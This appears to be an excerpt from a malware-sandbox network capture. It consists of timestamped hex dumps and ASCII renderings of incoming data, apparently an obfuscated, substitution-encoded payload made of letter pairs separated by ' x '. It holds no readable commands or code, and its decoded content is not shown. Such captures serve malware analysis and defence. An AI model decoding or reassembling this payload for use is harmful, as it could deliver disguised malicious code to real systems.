                                                            2021-10-29 18:11:00 UTC2706INData Raw: 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 45 20 78 20 59 59 20 78 20 59 4f 20 78 20 4b 74 20 78 20 6b 59 20 78 20 74 4b 20 78 20 4b 74 20 78 20 51 51 20 78 20 74 74 20 78 20 59 78 20 78 20 52 74 20 78 20 59 4f 20 78 20 4f 78 4f 20 78 20 74 4f 20 78 20 4f 78 4f 20 78 20 74 52 20 78 20 4b 45 20 78 20 74 6b 20 78 20 59 59 20 78 20 74 4b 20 78 20 59 59 20 78 20 4f 4f 59 20 78 20 4f 6f 4f 20 78 20 4b 51 20 78 20 59 4b 20 78 20 51 51 20 78 20 52 74 20 78 20 4f 4f
                                                            Data Ascii: Y x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x kE x YY x YO x Kt x kY x tK x Kt x QQ x tt x Yx x Rt x YO x OxO x tO x OxO x tR x KE x tk x YY x tK x YY x OOY x OoO x KQ x YK x QQ x Rt x OO
                                                            2021-10-29 18:11:00 UTC2710INData Raw: 51 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 52 51 20 78 20 52 59 20 78 20 4b 74 20 78 20 59 74 20 78 20 4f 6f 4f 20 78 20 59 6f 20 78 20 59 4b 20 78 20 4f 4f 52 20 78 20 6b 45 20 78 20 4f 4f 78 20 78 20 4b 74 20 78 20 59 52 20 78 20 4f 6f 4f 20 78 20 4f 78 4f 20 78 20 4b 74 20 78 20 59 52 20 78 20 4f 4f 74 20 78 20 51 51 20 78 20 4b 74 20 78 20 59 52 20 78 20 59 4b 20 78 20 4f 78 45 20 78 20 4f 78 59 20 78 20 4b 51 20 78 20 6b 6f 20 78 20 74 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20
                                                            Data Ascii: Q x RY x RY x tE x RQ x RY x Kt x Yt x OoO x Yo x YK x OOR x kE x OOx x Kt x YR x OoO x OxO x Kt x YR x OOt x QQ x Kt x YR x YK x OxE x OxY x KQ x ko x tk x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY
                                                            2021-10-29 18:11:00 UTC2714INData Raw: 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20 78 20 59 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 4f 78 45 20 78 20 4f 78 45 20 78 20 74 45 20 78 20 52 74 20 78 20 52 59 20 78 20 59 59 20 78 20 51 51 20 78 20 6b 45 20 78 20 74 4b 20 78 20 59 6f 20 78 20 4f 78 51 20 78 20 4f 4f 4f 20 78 20 59 45 20 78 20 59 6f 20 78 20 4f 78
                                                            Data Ascii: O x RY x RY x RY x RY x Kt x Kt x YR x RY x Kt x Kt x YR x RY x Kt x Kt x YR x RY x Kt x Kt x YR x RY x Kt x Kt x YR x RY x Kt x Kt x YR x RY x Kt x Kt x YR x RY x YY x tO x kY x OxE x OxE x tE x Rt x RY x YY x QQ x kE x tK x Yo x OxQ x OOO x YE x Yo x Ox
                                                            2021-10-29 18:11:00 UTC2718INData Raw: 45 20 78 20 6b 78 20 78 20 4f 78 52 20 78 20 59 6f 20 78 20 4b 45 20 78 20 6b 78 20 78 20 4f 78 52 20 78 20 59 6f 20 78 20 4b 45 20 78 20 6b 78 20 78 20 4f 78 52 20 78 20 59 6f 20 78 20 4b 45 20 78 20 6b 78 20 78 20 4f 78 52 20 78 20 59 6f 20 78 20 4b 45 20 78 20 6b 78 20 78 20 4f 78 52 20 78 20 59 6f 20 78 20 4b 45 20 78 20 6b 78 20 78 20 4f 78 52 20 78 20 59 6f 20 78 20 4f 4f 4b 20 78 20 6b 6b 20 78 20 74 6b 20 78 20 4f 6f 6f 20 78 20 4f 4f 6b 20 78 20 6b 59 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 4f 78 45 20 78 20 6b 4b 20 78 20 6b 4f 20 78 20 4b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 6b 20 78 20 6b 51 20 78 20 51 78 20 78 20 4f 4f 45 20 78 20 4b 74 20
                                                            Data Ascii: E x kx x OxR x Yo x KE x kx x OxR x Yo x KE x kx x OxR x Yo x KE x kx x OxR x Yo x KE x kx x OxR x Yo x KE x kx x OxR x Yo x OOK x kk x tk x Ooo x OOk x kY x OOR x tR x OxE x kK x kO x Kk x RY x RY x RY x RY x RY x RY x RY x RY x OOk x kQ x Qx x OOE x Kt
                                                            2021-10-29 18:11:00 UTC2722INData Raw: 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 59 6f 20 78 20 74 4b 20 78 20 59 74 20 78 20 4b 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 78 20 78 20 51 6b 20 78 20 51 74 20 78 20 4f 78 51 20 78 20 4f 6f 4f 20 78 20 4f 4f 6f 20 78 20 51 78 20 78 20 59 4f 20 78 20 4f 6f 78 20 78 20 6b 51 20 78 20 4f 78 6b 20 78 20 4f 4f 6f 20 78 20 4f 6f 6f 20 78 20 4f 4f 6f 20 78 20 4f 78 78 20 78 20 59 6f 20 78 20 59 78 20 78 20 51 6b 20 78 20 74 4f 20 78 20 4f 78 78 20 78 20 59 59 20 78 20 59 74 20 78 20 74 4f 20 78 20 59 52 20 78 20 59 59 20 78 20 59 4b 20 78 20 4f 4f 45 20 78 20 4f 78 78 20 78 20 59 59 20 78 20
                                                            Data Ascii: x RY x RY x RY x RY x RY x RY x RY x Yo x tK x Yt x Kk x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Yx x Qk x Qt x OxQ x OoO x OOo x Qx x YO x Oox x kQ x Oxk x OOo x Ooo x OOo x Oxx x Yo x Yx x Qk x tO x Oxx x YY x Yt x tO x YR x YY x YK x OOE x Oxx x YY x
                                                            2021-10-29 18:11:00 UTC2726INData Raw: 45 20 78 20 52 51 20 78 20 59 4b 20 78 20 4f 4f 6b 20 78 20 74 45 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78
                                                            Data Ascii: E x RQ x YK x OOk x tE x RR x Oxk x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x
                                                            2021-10-29 18:11:00 UTC2730INData Raw: 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 59 74 20 78 20 74 74 20 78 20 4f 6f 4f 20 78 20 4f 4f 52 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f 20 78 20 4f 78 6b 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f 20 78 20 4f 78 6b 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f 20 78 20 4f 78 6b 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f 20 78 20 4f 78 6b 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f 20 78 20 4f 78 6b 20 78 20 59 6f
                                                            Data Ascii: RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x Yt x tt x OoO x OOR x Yo x YY x OoO x Oxk x Yo x YY x OoO x Oxk x Yo x YY x OoO x Oxk x Yo x YY x OoO x Oxk x Yo x YY x OoO x Oxk x Yo
                                                            2021-10-29 18:11:00 UTC2735INData Raw: 20 78 20 6b 59 20 78 20 6b 59 20 78 20 59 45 20 78 20 52 74 20 78 20 4f 6f 78 20 78 20 74 78 20 78 20 74 74 20 78 20 74 51 20 78 20 4f 78 45 20 78 20 51 51 20 78 20 6b 4b 20 78 20 6b 4b 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 74 6f 20 78 20 52 51 20 78 20 4b 6b 20 78 20 4f 4f 51 20 78 20 59 4b 20 78 20 52 52 20 78 20 4f 6f 78 20 78 20 74 6b 20 78 20 74 74 20 78 20 74 51 20 78 20 4f 78 45 20 78 20 51 51 20 78 20 6b 4b 20 78 20 6b 4b 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 74 6f 20 78 20 52 51 20 78 20 4b 6b 20 78 20 4f 4f 51 20 78 20 59 4b 20 78 20 52 52 20 78 20 4f 6f 78 20 78 20 74 6b 20 78 20 74 74 20 78 20 74 51 20 78 20 4f 78 45 20 78 20 51 51 20 78 20 6b 4b 20 78 20 6b 4b 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 74 6f 20 78 20 52 51 20 78 20 4b
                                                            Data Ascii: x kY x kY x YE x Rt x Oox x tx x tt x tQ x OxE x QQ x kK x kK x Rk x OOO x to x RQ x Kk x OOQ x YK x RR x Oox x tk x tt x tQ x OxE x QQ x kK x kK x Rk x OOO x to x RQ x Kk x OOQ x YK x RR x Oox x tk x tt x tQ x OxE x QQ x kK x kK x Rk x OOO x to x RQ x K
                                                            2021-10-29 18:11:00 UTC2739INData Raw: 20 6b 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 74 4b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 52 6b 20 78 20 4f 6f 78 20 78 20 74 74 20 78 20 52 6b 20 78 20 4b 45 20 78 20 4f 78 52 20 78 20 4f 4f 6f 20 78 20 74 4f 20 78 20 6b 6f 20 78 20 4b 74 20 78 20 59 4b 20 78 20 74 4f 20 78 20 4f 78 4b 20 78 20 4f 4f 45 20 78 20 4f 78 78 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4b 20 78 20 4f 78 52 20 78 20 74 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 52 20 78 20 59 59 20 78 20 59 78 20 78 20 59 52 20 78 20 4f 78 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 6b 52 20 78 20 59 4f 20 78
                                                            Data Ascii: kO x kO x RY x tK x RY x RY x RY x RY x RY x kO x RY x RY x RY x RY x Rk x Rk x Oox x tt x Rk x KE x OxR x OOo x tO x ko x Kt x YK x tO x OxK x OOE x Oxx x tE x RY x RY x RY x RY x kK x OxR x to x RY x RY x OOR x YY x Yx x YR x OxE x OOk x Kt x kR x YO x
                                                            2021-10-29 18:11:00 UTC2743INData Raw: 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 45 20 78 20 59 52 20 78 20 4f 6f 78 20 78 20 4f 78 78 20 78 20 6b 4b 20 78 20 4b 74 20 78 20 59 52 20 78 20 6b 78 20 78 20 74 52 20 78 20 4b 51 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 6b 52 20 78 20 59 4f 20 78 20 4f 4f 6b 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4f 4f 6b 20 78 20 59 59 20 78 20 6b 45 20 78 20 52 59 20 78 20 4b 74 20 78 20 59 4f 20 78 20 4f 4f 6f 20 78 20 4f 78 51 20 78 20 52 74 20 78 20 4f 4f 6b 20 78 20 59 74 20 78 20 4b 45 20 78 20 4f 78 78 20 78 20 4b 51 20 78 20 6b 6b 20 78 20 4b 74 20 78 20 4f 78 51 20 78 20 4b 51 20 78 20 59 74 20 78 20 4f 6f 4f 20 78 20 4b 74 20 78
                                                            Data Ascii: Kt x Kt x Kt x Kt x Kt x Kt x KE x YR x Oox x Oxx x kK x Kt x YR x kx x tR x KQ x Kt x Kt x Kt x Kt x Kt x Kt x Kt x kR x YO x OOk x Rk x Kt x OOk x YY x kE x RY x Kt x YO x OOo x OxQ x Rt x OOk x Yt x KE x Oxx x KQ x kk x Kt x OxQ x KQ x Yt x OoO x Kt x
                                                            2021-10-29 18:11:00 UTC2747INData Raw: 78 20 52 6b 20 78 20 4b 74 20 78 20 4f 4f 78 20 78 20 4f 4f 45 20 78 20 4f 78 4f 20 78 20 4f 4f 51 20 78 20 4b 74 20 78 20 59 45 20 78 20 59 4b 20 78 20 4f 4f 78 20 78 20 4f 4f 59 20 78 20 6b 78 20 78 20 4b 45 20 78 20 4f 78 4f 20 78 20 4f 4f 6f 20 78 20 59 59 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4f 4f 78 20 78 20 4f 4f 45 20 78 20 4f 78 4f 20 78 20 4f 4f 51 20 78 20 4b 74 20 78 20 59 45 20 78 20 59 4b 20 78 20 4f 4f 78 20 78 20 4f 4f 59 20 78 20 6b 78 20 78 20 4b 45 20 78 20 4f 78 4f 20 78 20 4f 4f 6f 20 78 20 59 59 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4f 4f 78 20 78 20 4f 4f 45 20 78 20 4f 78 4f 20 78 20 4f 4f 51 20 78 20 4b 74 20 78 20 59 45 20 78 20 59 4b 20 78 20 4f 4f 78 20 78 20 4f 4f 59 20 78 20 6b 78 20 78 20 4b 45 20 78 20 4f 78 4f 20 78 20
                                                            Data Ascii: x Rk x Kt x OOx x OOE x OxO x OOQ x Kt x YE x YK x OOx x OOY x kx x KE x OxO x OOo x YY x Rk x Kt x OOx x OOE x OxO x OOQ x Kt x YE x YK x OOx x OOY x kx x KE x OxO x OOo x YY x Rk x Kt x OOx x OOE x OxO x OOQ x Kt x YE x YK x OOx x OOY x kx x KE x OxO x
                                                            2021-10-29 18:11:00 UTC2750INData Raw: 78 20 74 59 20 78 20 6b 51 20 78 20 52 59 20 78 20 6b 78 20 78 20 59 74 20 78 20 6b 52 20 78 20 6b 4f 20 78 20 4f 4f 51 20 78 20 74 6f 20 78 20 4b 6b 20 78 20 6b 78 20 78 20 6b 4b 20 78 20 4f 78 45 20 78 20 74 4f 20 78 20 4f 78 6b 20 78 20 4f 4f 6b 20 78 20 6b 78 20 78 20 4f 4f 45 20 78 20 4b 6b 20 78 20 4f 78 6f 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 59 59 20 78 20 74 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 6f 20 78 20 74 6b 20 78 20 4b 74 20 78 20 74 52 20 78 20 4b 74 20 78 20 59 74 20 78 20 6b 78 20 78 20 6b 4b 20 78 20 4f 6f 4f 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 52 6b 20 78 20 4f 6f 78 20 78 20 51 51 20 78 20 74 6f 20 78 20 4b 74 20 78 20 4f 4f 74 20 78 20 4f 4f 4b 20 78 20 4f 4f 74 20 78 20 4b 45 20 78 20 4b 74 20 78 20 59 74 20 78 20
                                                            Data Ascii: x tY x kQ x RY x kx x Yt x kR x kO x OOQ x to x Kk x kx x kK x OxE x tO x Oxk x OOk x kx x OOE x Kk x Oxo x Kt x OOK x YY x tt x Kt x Kt x Yo x tk x Kt x tR x Kt x Yt x kx x kK x OoO x OOk x Kt x Rk x Oox x QQ x to x Kt x OOt x OOK x OOt x KE x Kt x Yt x
                                                            2021-10-29 18:11:00 UTC2754INData Raw: 20 4b 74 20 78 20 59 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 59 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 59 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 59 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 59 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20
                                                            Data Ascii: Kt x YK x Kt x Kt x OOK x Kt x KE x OOk x Kt x YK x Kt x Kt x OOK x Kt x KE x OOk x Kt x YK x Kt x Kt x OOK x Kt x KE x OOk x Kt x YK x Kt x Kt x OOK x Kt x KE x OOk x Kt x YK x Kt x Kt x OOK x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x
                                                            2021-10-29 18:11:00 UTC2758INData Raw: 20 78 20 4f 78 6f 20 78 20 4b 74 20 78 20 51 78 20 78 20 4f 4f 74 20 78 20 74 74 20 78 20 52 6b 20 78 20 4b 74 20 78 20 59 78 20 78 20 51 6b 20 78 20 4f 78 52 20 78 20 52 52 20 78 20 4b 74 20 78 20 59 74 20 78 20 4f 78 51 20 78 20 59 6f 20 78 20 4f 4f 51 20 78 20 4f 78 6f 20 78 20 4b 74 20 78 20 51 78 20 78 20 4f 4f 74 20 78 20 74 74 20 78 20 74 52 20 78 20 4b 74 20 78 20 59 78 20 78 20 51 6b 20 78 20 4f 78 52 20 78 20 52 74 20 78 20 4b 74 20 78 20 59 74 20 78 20 4f 78 51 20 78 20 59 6f 20 78 20 4f 4f 51 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 51 78 20 78 20 4f 4f 74 20 78 20 74 74 20 78 20 74 6f 20 78 20 4b 74 20 78 20 59 78 20 78 20 51 6b 20 78 20 4f 78 52 20 78 20 52 59 20 78 20 4b 74 20 78 20 59 74 20 78 20 4f 78 51 20 78 20 59 78 20 78 20 4f 4f 51
                                                            Data Ascii: x Oxo x Kt x Qx x OOt x tt x Rk x Kt x Yx x Qk x OxR x RR x Kt x Yt x OxQ x Yo x OOQ x Oxo x Kt x Qx x OOt x tt x tR x Kt x Yx x Qk x OxR x Rt x Kt x Yt x OxQ x Yo x OOQ x OOk x Kt x Qx x OOt x tt x to x Kt x Yx x Qk x OxR x RY x Kt x Yt x OxQ x Yx x OOQ
                                                            2021-10-29 18:11:00 UTC2762INData Raw: 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 59 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78
                                                            Data Ascii: RY x RY x RY x Rk x YR x RY x RY x RY x RY x kO x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x
                                                            2021-10-29 18:11:00 UTC2767INData Raw: 20 6b 78 20 78 20 4b 74 20 78 20 4f 78 51 20 78 20 59 4b 20 78 20 4f 4f 74 20 78 20 4f 78 52 20 78 20 4b 74 20 78 20 59 6f 20 78 20 74 6b 20 78 20 4f 6f 4f 20 78 20 59 4b 20 78 20 4b 74 20 78 20 59 52 20 78 20 74 4f 20 78 20 59 74 20 78 20 4f 78 52 20 78 20 4b 74 20 78 20 4b 74 20 78 20 74 4f 20 78 20 4f 6f 6f 20 78 20 59 74 20 78 20 59 59 20 78 20 4b 74 20 78 20 4f 4f 74 20 78 20 51 51 20 78 20 74 52 20 78 20 6b 4f 20 78 20 4b 74 20 78 20 59 59 20 78 20 4f 4f 78 20 78 20 52 74 20 78 20 4b 6b 20 78 20 6b 78 20 78 20 4b 45 20 78 20 59 45 20 78 20 4f 4f 51 20 78 20 4f 4f 52 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4f 4f 74 20 78 20 51 51 20 78 20 74 52 20 78 20 6b 4f 20 78 20 4b 74 20 78 20 59 59 20 78 20 4f 4f 78 20 78 20 52 74 20 78 20 4b 6b 20 78 20 6b 78
                                                            Data Ascii: kx x Kt x OxQ x YK x OOt x OxR x Kt x Yo x tk x OoO x YK x Kt x YR x tO x Yt x OxR x Kt x Kt x tO x Ooo x Yt x YY x Kt x OOt x QQ x tR x kO x Kt x YY x OOx x Rt x Kk x kx x KE x YE x OOQ x OOR x Rk x Kt x OOt x QQ x tR x kO x Kt x YY x OOx x Rt x Kk x kx
                                                            2021-10-29 18:11:00 UTC2771INData Raw: 74 59 20 78 20 4f 6f 78 20 78 20 52 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 4f 4f 59 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 4b 20 78 20 52 51 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 74 59 20 78 20 4f 6f 78 20 78 20 52 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 4f 4f 59 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 4b 20 78 20 52 51 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 74 59 20 78 20 4f 6f 78 20 78 20 52 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 4f 4f 59 20 78 20 6b 4f 20 78 20 6b 45 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52
                                                            Data Ascii: tY x Oox x RR x RY x RY x Rt x OOY x kO x kO x RY x RY x OOK x RQ x RQ x RY x RY x tY x Oox x RR x RY x RY x Rt x OOY x kO x kO x RY x RY x OOK x RQ x RQ x RY x RY x tY x Oox x RR x RY x RY x Rt x OOY x kO x kE x OxE x RY x RY x RY x RY x kO x RY x RY x R
                                                            2021-10-29 18:11:00 UTC2775INData Raw: 4f 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 74 59 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 52 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 78 20 78 20 4f 4f 78 20 78 20 52 51 20 78 20 6b 4f 20 78 20 52 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 51 6b 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 74 4f 20 78 20 74 74 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 51 20 78 20 52 51 20 78 20 52 59 20 78 20 51 6b 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 59 20 78 20 52 59
                                                            Data Ascii: O x RY x tO x OOQ x RY x tY x OOQ x RR x RR x RY x RY x RY x RY x OxE x RY x RR x kx x OOx x RQ x kO x RY x Qx x kO x RR x Ooo x RY x tO x kY x RY x Qk x RY x RR x Oxk x RY x tO x tt x RY x Oxx x RY x RY x OxE x RY x RQ x RQ x RY x Qk x RY x RR x OOY x RY
                                                            2021-10-29 18:11:00 UTC2779INData Raw: 78 20 78 20 74 74 20 78 20 52 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 4f 59 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 6b 51 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4b 6b 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 51 78 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 51 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 74 4f 20 78 20 4b 6b 20 78 20 52 59 20 78 20 51 51 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 74 4b 20 78 20 52 59 20 78 20 52 51 20 78 20 74 74 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 6f 4f 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 4f
                                                            Data Ascii: x x tt x RY x Qx x kO x RR x OOY x RY x tO x kY x RY x kQ x OOQ x RR x Kk x RY x tO x kY x RY x Qx x RY x RY x OxE x RY x RQ x Oxt x RY x Oxx x RY x RR x Oxk x RY x tO x Kk x RY x QQ x OOQ x RY x tK x RY x RQ x tt x RY x Oxx x RY x RR x OoO x RY x tO x OO
                                                            2021-10-29 18:11:00 UTC2782INData Raw: 20 74 45 20 78 20 52 59 20 78 20 52 51 20 78 20 4b 6b 20 78 20 52 59 20 78 20 6b 59 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 74 78 20 78 20 74 74 20 78 20 52 59 20 78 20 6b 51 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 4f 74 20 78 20 52 59 20 78 20 74 6f 20 78 20 74 74 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 4b 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 51 51 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 4f 4f 6f 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 